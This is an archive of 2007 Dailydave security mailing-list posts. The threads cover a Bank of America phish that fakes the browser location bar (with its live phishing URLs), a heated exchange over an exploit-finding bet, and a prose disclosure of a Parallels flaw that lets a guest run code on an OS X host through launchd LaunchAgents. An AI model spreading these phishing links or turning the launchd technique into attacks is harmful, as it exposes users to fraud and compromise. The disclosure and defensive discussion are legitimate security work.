krpatasec at gmail.com Mon Feb 12 14:16:23 2007 From: krpatasec at gmail.com (Tyler Krpata) Date: Mon, 12 Feb 2007 14:16:23 -0500 Subject: [Dailydave] Interesting phish Message-ID: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> I had an interesting Bank of America phish pointed out to me...it gets around the "wrong URL" problem by popping up a new window which disables the location bar and creates a lookalike IE location bar of its own which contains a legit URL. This is something I had actually been thinking about and played with a bit about a year ago, so I'm not hugely surprised to see it in the wild. (Apologies if this is not a new tactic, but I hadn't seen it before.) Not sure if it's kosher to post phishing URL's to the list, but I will if anyone wants to see it. From olef.anderson at gmail.com Mon Feb 12 16:11:55 2007 From: olef.anderson at gmail.com (Olef Anderson) Date: Mon, 12 Feb 2007 13:11:55 -0800 Subject: [Dailydave] Some Sums In-Reply-To: <20070210204144.GA20960@codenomicon.com> References: <20070210204144.GA20960@codenomicon.com> Message-ID: <9b4f936f0702121311pe313c28wa289096db651731a@mail.gmail.com> company, and refuse to disclose flaws in commercial software (and our > customers appreciate this). We are not in the blackmailing > business... Open source would be free target though (my personal > opinion, not our company opinion). Thirdly, we do not build exploits > like Dave already pointed out earlier, again from ethical reasons (and > because nobody has ever asked us to develop exploits for the found > flaws even if building the exploit would be easy). And last note, we > would have no use nor interest for your exploit, nor would we want to > even see it due to the related liability issues. Blackmailing business ? Where did you come up with that ? There is a difference in not wanting to offer any free services to Microsoft and blackmailing it ? If you can't tell the difference between the two, you really don't understand much about the nuances of the field you are trying to get some traction from. However you are always quick to respond to Dave's emails regarding Canvas/Spike etc and inserting your worthless commercial rhetoric, I am for a change offering you to do it like a man ? So can you handle that or will keep being the half-assed corporate mouthpiece ? So I am sorry I have to decline the offer. You are free to continue > hunting for your fame and glory from the remote exploits. I wish you > good luck in the hunt! And I will shut up about our products as I > definitely do not even want you to get these tools in your hand. ;) Trust me, I would not have any use for your tool. Like many of your contemporaries, your product is an one big blunder and yet another silly excuse to launch a security company. Also if I was for any fame and glory, don't you think I wouldn't settle for the silly credit in Microsoft advisories like many of eEye's foreign imports ? I am (like any other researcher with enough years of experience under his/her belt) are solely interested in the financial gain, pay me my hourly rate and I don't care if you act like you don't even know me, that's just fine. I hope you had a chance to visit us at RSA! We are constantly looking > for skilled people who wish to start doing more proactive work in > security. Proactive work ? ahaha now thats just crazy funny! Olef. > On Thu, Feb 08, 2007 at 01:22:02PM -0500, > dailydave-request at lists.immunitysec.com wrote: > > Date: Thu, 8 Feb 2007 09:48:36 -0800 > > From: "Olef Anderson" > > Subject: Re: [Dailydave] Some Sums > > To: dailydave at lists.immunitysec.com > > > > About this whole fuzzer business, how about putting some cold hard cash > > where the corporate mouthpiece is at ? > > Since obviously you happen to have some VC money, a booth at the RSA > floor > > is a sign, you can back your claims with real currency. I would love to > give > > you the opportunity. > > > > Lets take the latest Microsoft Exchange release (2007) and 2 weeks of > your > > time running your PROTOS fuzzer. At the end of the 2 weeks if you can > find > > the existing remote root hole in it, I am offering to pay you the bugs > worth > > of $150 000.00. However If you are not successful, I should be payed the > > very same amount which in return I shall present you the exploit. From > that > > point you will be free to coordinate vendors, release advisories > whatever it > > takes. Just to clarify a point though, no DoSes are acceptable, should > be an > > overflow that leads to clear code execution ( the mailing list > subscribers > > could be the judge of that). > > > > Wouldn't that be nice to prove that you actually know what you are > talking > > about ? > > > > On 2/7/07, Ari Takanen wrote: > > > > > > Hmmm, distantly related to this: Maybe us fuzzer developers should > > > save hashes of some millions of attacks somewhere also, so that we can > > > prove our tools were used to find the flaws in the first > > > place... Looking at past iDefence disclosures for example, I am > > > beginning to doubt that they reward for publishing flaws instead of > > > finding flaws (this is like patent system in Europe which rewards > > > first to file, not first to invent)... More and more flaws are found > > > using tools, and pre-packaged attacks. If a flaw is found using a > > > product like Codenomicon/PROTOS or CANVAS, I supposed the reward > > > should also be paid to the tool developer and not the tool user. ;) > > > > > > Tongue-in-the-cheek-greetings, > > > > > > /Ari > > -- > -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- > Ari Takanen Codenomicon Ltd. > ari.takanen at codenomicon.com Tutkijantie 4E > tel: +358-40 50 67678 FIN-90570 Oulu > http://www.codenomicon.com Finland > PGP: http://www.codenomicon.com/codenomicon-key.asc > -o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o-o- > _______________________________________________ > Dailydave mailing list > Dailydave at lists.immunitysec.com > http://lists.immunitysec.com/mailman/listinfo/dailydave > -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070212/d7943a01/attachment-0001.htm From fyodor at insecure.org Mon Feb 12 16:13:30 2007 From: fyodor at insecure.org (Fyodor) Date: Mon, 12 Feb 2007 13:13:30 -0800 Subject: [Dailydave] Interesting phish In-Reply-To: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> References: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> Message-ID: <20070212211330.GC14756@syn.lnxnet.net> On Mon, Feb 12, 2007 at 02:16:23PM -0500, Tyler Krpata wrote: > I had an interesting Bank of America phish pointed out to me...it gets > around the "wrong URL" problem by popping up a new window which > disables the location bar and creates a lookalike IE location bar of > its own which contains a legit URL. This is something I had actually IMHO, pages should not be able to hide your location bar, titlebar, or menubar, prevent you from resizing/moving/scrolling windows, or anything of the sort. Firefox has for many years offered config options to protect you from all this. Unfortunately, some of them are still not enabled by default. CERT has a good description here of the features (related to a similar spoofing exploit which used XUL): http://www.kb.cert.org/vuls/id/262350 I don't know if IE offers this sort of protection. The release notes for IE7[1] at least note a way to prevent status bar spoofing (you need to enable this explicitly though) and they finally decided that web pages should not be able to secretly snarf all of the data in your clipboard. Cheers, Fyodor [1] http://msdn2.microsoft.com/en-us/ie/aa740486.aspx From druid at caughq.org Mon Feb 12 23:45:58 2007 From: druid at caughq.org (I)ruid) Date: Mon, 12 Feb 2007 22:45:58 -0600 Subject: [Dailydave] Interesting phish In-Reply-To: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> References: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> Message-ID: <1171341958.3762.3.camel@localhost> On Mon, 2007-02-12 at 14:16 -0500, Tyler Krpata wrote: > Not sure if it's kosher to post phishing URL's to the list, but I will > if anyone wants to see it. I'm not sure if it is either, but it's definitely kosher to post it here: http://www.phishtank.com They definitely want to see it. -- I)ruid, C?ISSP druid at caughq.org http://druid.caughq.org -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: This is a digitally signed message part Url : http://lists.immunitysec.com/pipermail/dailydave/attachments/20070212/3472d11c/attachment.pgp From krpatasec at gmail.com Tue Feb 13 08:41:46 2007 From: krpatasec at gmail.com (Tyler Krpata) Date: Tue, 13 Feb 2007 08:41:46 -0500 Subject: [Dailydave] Interesting phish In-Reply-To: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> References: <9d3431d0702121116i48046933h8bba441165028c07@mail.gmail.com> Message-ID: <9d3431d0702130541m6fe72c31w794f2f5f18941371@mail.gmail.com> Due to an overwhelming flood of requests to see the URL, here it is: http://www.progonline.com/en/index.html (attempts to launch popup) http://www.progonline.com/en/sys.php (direct link) On 2/12/07, Tyler Krpata wrote: > I had an interesting Bank of America phish pointed out to me...it gets > around the "wrong URL" problem by popping up a new window which > disables the location bar and creates a lookalike IE location bar of > its own which contains a legit URL. This is something I had actually > been thinking about and played with a bit about a year ago, so I'm not > hugely surprised to see it in the wild. (Apologies if this is not a > new tactic, but I hadn't seen it before.) > > Not sure if it's kosher to post phishing URL's to the list, but I will > if anyone wants to see it. > From dave at immunityinc.com Wed Feb 14 17:37:23 2007 From: dave at immunityinc.com (Dave Aitel) Date: Wed, 14 Feb 2007 17:37:23 -0500 Subject: [Dailydave] 0days are important Message-ID: <45D38F23.90300@immunityinc.com> An HTML attachment was scrubbed... URL: http://lists.immunitysec.com/pipermail/dailydave/attachments/20070214/4b0fe30f/attachment.htm From rmogull-dd at securosis.com Fri Feb 16 12:20:32 2007 From: rmogull-dd at securosis.com (Rich Mogull) Date: Fri, 16 Feb 2007 10:20:32 -0700 Subject: [Dailydave] Minor Virtualization Vulnerability In-Reply-To: <45D38F23.90300@immunityinc.com> References: <45D38F23.90300@immunityinc.com> Message-ID: Last week I accidentally discovered a vulnerability in default installations of Parallels that allows manipulation of the host operating system when it's OS X, leading to code execution. Parallels just changed their default options in the latest release to reduce the chances of this attack, but it's still possible if the user deliberately enables drag and drop throughout the entire file system. Last Friday Brian Krebs emailed me when he noticed his entire host OS file system being shared with the guest OS (OS X host, Windows guest). According to the Parallels forums, this was a known issue. By default, Parallels Desktop for Mac enabled Drag and Drop for guest operating systems. This creates a file share called .psf, which allows complete access to the host with the user's current permissions level. But just dropping an application into /Applications doesn't allow execution- I didn't track down why, but I think only read and write were enabled. After poking around I figured out that code execution, of a sort, is possible through manipulation of launchd (the OS X cron and other job replacement). My first attempt was to create a launchd job and place it into SystemDaemons, but that failed. There's no way to sudo between the guest and host, so even if you're an admin user, you can't hit certain directories. But I was able to create a job (just a plist file, xml) and drop it into the active user's LaunchAgents directory. Log out, log back in, and the job executes. Launchd is very flexible, allowing execution based on time or user events, and can include arguments.